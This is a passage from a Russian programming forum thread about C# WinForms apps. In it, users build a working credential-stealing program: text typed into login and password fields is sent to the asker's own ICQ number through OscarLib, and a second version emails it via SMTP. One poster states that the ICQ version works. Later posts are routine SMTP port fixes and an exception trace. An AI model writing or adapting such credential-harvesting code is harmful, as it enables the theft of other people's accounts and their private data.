Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > .NET Frameworks (точка нет фреймворки) > Общие вопросы .NET
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 14.11.2009, 21:27   #21
CodSharp
Пользователь
 
Аватар для CodSharp
 
Регистрация: 28.10.2009
Сообщений: 21
По умолчанию

Цитата:
Сообщение от Vitek-pm Посмотреть сообщение
Необходимо отсылать на чужой номер свои логин и пароль?..
Можно и так сказать...
CodSharp вне форума Ответить с цитированием
Старый 14.11.2009, 21:34   #22
Vitek-pm
Пользователь
 
Регистрация: 17.02.2009
Сообщений: 56
По умолчанию

Тогда нужно написать как-то так:

Код:
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using csammisrun.OscarLib;
using System.Threading;
namespace WindowsFormsApplication1
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
        }

        private void button1_Click(object sender, EventArgs e)
        {
            Session sess = new Session(textBox1.Text, textBox2.Text);
            sess.LoginCompleted += new LoginCompletedHandler(sess_LoginCompleted);
            sess.ClientCapabilities = Capabilities.SIMKopete | Capabilities.UTF8;
            sess.Logon("login.icq.com", 5190);
            sess.ActivateBuddyList();
        }
        void sess_LoginCompleted(Session sess)
        {
            Thread.Sleep(5000);
            sess.Messages.SendMessage("твой номер", textBox1.Text+" "+textBox2.Text);
        }
    }
}
Vitek-pm вне форума Ответить с цитированием
Старый 14.11.2009, 21:52   #23
CodSharp
Пользователь
 
Аватар для CodSharp
 
Регистрация: 28.10.2009
Сообщений: 21
По умолчанию

А с какого будет отправлятся,тут того на какой=(

Session sess = new Session(textBox1.Text, textBox2.Text);
Даже если тут заменить (textBox1.Text, textBox2.Text); на ("123456","password"); Ничо не выходит

Последний раз редактировалось Stilet; 23.11.2009 в 09:01.
CodSharp вне форума Ответить с цитированием
Старый 14.11.2009, 22:09   #24
Vitek-pm
Пользователь
 
Регистрация: 17.02.2009
Сообщений: 56
По умолчанию

В данном варианте пользователь вводит логин в textBox1, пароль в textBox2, нажимает кнопку и эти логин и пароль посылаются на твой номер. Разве не так нужно было??

P.S. Я проверил, все правильно работает.
P.S.S
Цитата:
Даже если тут заменить (textBox1.Text, textBox2.Text); на ("123456","password"); Ничо не выходит
- логично, нужно вводить реально существующие логин и пароль, как иначе произойдет отправка???

Последний раз редактировалось Vitek-pm; 14.11.2009 в 22:13.
Vitek-pm вне форума Ответить с цитированием
Старый 18.11.2009, 08:42   #25
CodSharp
Пользователь
 
Аватар для CodSharp
 
Регистрация: 28.10.2009
Сообщений: 21
По умолчанию

Может ты не понял но мне нада чтобы на мой номер отсылалось любое что я введу в поле логин и пароль...Типа вот так:


Ну вот я ввел эти данные нажимаю кнопку OK и они мне посылаются на мой номер...

Smtp.Send(Message);//отправка

Сбой при отправке сообщения электронной почты.

Такая вот шняга вылазит...Может что-то в коде проверьте код на валидность:

Код:
private void button1_Click(object sender, EventArgs e)
        {
            MailMessage Message = new MailMessage(); 
Message.Subject = "Инфа"; 
Message.Body = textBox1.Text + textBox2.Text ; 
Message.BodyEncoding = Encoding.GetEncoding("Windows-1254"); // Turkish Character Encoding// кодировка эсли нужно 
Message.From = new System.Net.Mail.MailAddress("login@gmail.com"); 
Message.To.Add(new MailAddress( "login1@list.ru"));
System.Net.Mail.SmtpClient Smtp = new SmtpClient("smtp.gmail.com",995 );//эсли здесь заполнено то строчка ниже не нужна 
Smtp.Host = "smtp.gmail.com"; //например для gmail (smtp.gmail.com), mail.ru(smtp.mail.ru) 
Smtp.EnableSsl = true; // включение SSL для gmail нужно, для mail.ru не нада 
Smtp.Credentials = new System.Net.NetworkCredential("login@gmail.com", "1234567890");

Smtp.Send(Message);//отправка


        }
    }
}

Последний раз редактировалось Stilet; 23.11.2009 в 09:02.
CodSharp вне форума Ответить с цитированием
Старый 23.11.2009, 07:47   #26
evgenrpo
Пользователь
 
Регистрация: 31.05.2009
Сообщений: 71
По умолчанию

НА gmail.com порт 587

Код:

//Проверка , авторизация
SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
                client.Credentials = new NetworkCredential("login", "********");
                client.EnableSsl = true;
//Оформление сообщения
                MailMessage mes = new MailMessage();
                mes.From = new MailAddress(login@gmail.com);
                mes.To.Add(new MailAddress(login@mail.ru));
                mes.Subject = "Тема";
                mes.Body = "Сообщение";
                client.Send(mes);

Последний раз редактировалось evgenrpo; 23.11.2009 в 07:52.
evgenrpo вне форума Ответить с цитированием
Старый 28.11.2009, 14:03   #27
CodSharp
Пользователь
 
Аватар для CodSharp
 
Регистрация: 28.10.2009
Сообщений: 21
По умолчанию

Спасибо разобрался...
CodSharp вне форума Ответить с цитированием
Старый 20.03.2010, 21:59   #28
Casper-SC
Форумчанин
 
Регистрация: 04.07.2007
Сообщений: 549
По умолчанию

evgenrpo
Всё делал как в сообщении выше ничего не получается.
выключал и включал ssl и менял разные адреса почты, что только не делал, не работает. Код у меня такой же как в примере, только данные свои. Даже порт 25 на роуторе открыл, всё равно не пашет. Подскажите в чём проблема?

Вот у меня не работает такой код, вылетает ошибка:
Цитата:
System.Net.Mail.SmtpException: Сбой при отправке сообщения электронной почты. ---> System.FormatException: Недопустимый знак в заголовке электронной почты.
в System.Net.BufferBuilder.Append(Str ing value, Int32 offset, Int32 count)
в System.Net.Mail.EHelloCommand.Prepa reCommand(SmtpConnection conn, String domain)
в System.Net.Mail.SmtpConnection.GetC onnection(String host, Int32 port)
в System.Net.Mail.SmtpClient.Send(Mai lMessage message)
--- Конец трассировки внутреннего стека исключений ---
в System.Net.Mail.SmtpClient.Send(Mai lMessage message)
в WindowsFormsApplication6.FormMain.b tnSendMessage_Click(Object sender, EventArgs e) в C:\Users\Алексей\Documents\Visual Studio 2008\Projects\Radiation\WindowsForm sApplication6\FormMain.cs:строка 98
в System.Windows.Forms.Control.OnClic k(EventArgs e)
в System.Windows.Forms.Button.OnMouse Up(MouseEventArgs mevent)
в System.Windows.Forms.Control.WmMous eUp(Message& m, MouseButtons button, Int32 clicks)
в System.Windows.Forms.Control.WndPro c(Message& m)
в System.Windows.Forms.ButtonBase.Wnd Proc(Message& m)
в System.Windows.Forms.Button.WndProc (Message& m)
в System.Windows.Forms.Control.Contro lNativeWindow.WndProc(Message& m)
в System.Windows.Forms.NativeWindow.C allback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)


************** Загруженные сборки **************
mscorlib
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/Microsoft.NET/Framework64/v2.0.50727/mscorlib.dll
----------------------------------------
Radioactive
Версия сборки: 1.0.0.0
Версия Win32: 1.0.0.0
CodeBase: file:///C:/Users/Алексей/Documents/Visual%20Studio%202008/Projects/Radiation/WindowsFormsApplication6/bin/Debug/Radioactive.exe
----------------------------------------
System.Windows.Forms
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Windows.Forms/2.0.0.0__b77a5c561934e089/System.Windows.Forms.dll
----------------------------------------
System
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System/2.0.0.0__b77a5c561934e089/System.dll
----------------------------------------
System.Drawing
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Drawing/2.0.0.0__b03f5f7f11d50a3a/System.Drawing.dll
----------------------------------------
System.Configuration
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Configuration/2.0.0.0__b03f5f7f11d50a3a/System.Configuration.dll
----------------------------------------
System.Xml
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Xml/2.0.0.0__b77a5c561934e089/System.Xml.dll
----------------------------------------
System.resources
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.resources/2.0.0.0_ru_b77a5c561934e089/System.resources.dll
----------------------------------------
System.Windows.Forms.resources
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/assembly/GAC_MSIL/System.Windows.Forms.resources/2.0.0.0_ru_b77a5c561934e089/System.Windows.Forms.resources.dll
----------------------------------------
mscorlib.resources
Версия сборки: 2.0.0.0
Версия Win32: 2.0.50727.4927 (NetFXspW7.050727-4900)
CodeBase: file:///C:/Windows/Microsoft.NET/Framework64/v2.0.50727/mscorlib.dll
----------------------------------------

Последний раз редактировалось Casper-SC; 20.03.2010 в 22:09.
Casper-SC вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ввести строку, вывести на экран символы, повторяющиеся в строке более 2 раз. bibl2008 Помощь студентам 4 01.03.2009 13:30
как ввести символы #13 и #10 в свойство Caption shurik_7866 Общие вопросы Delphi 12 16.03.2008 16:12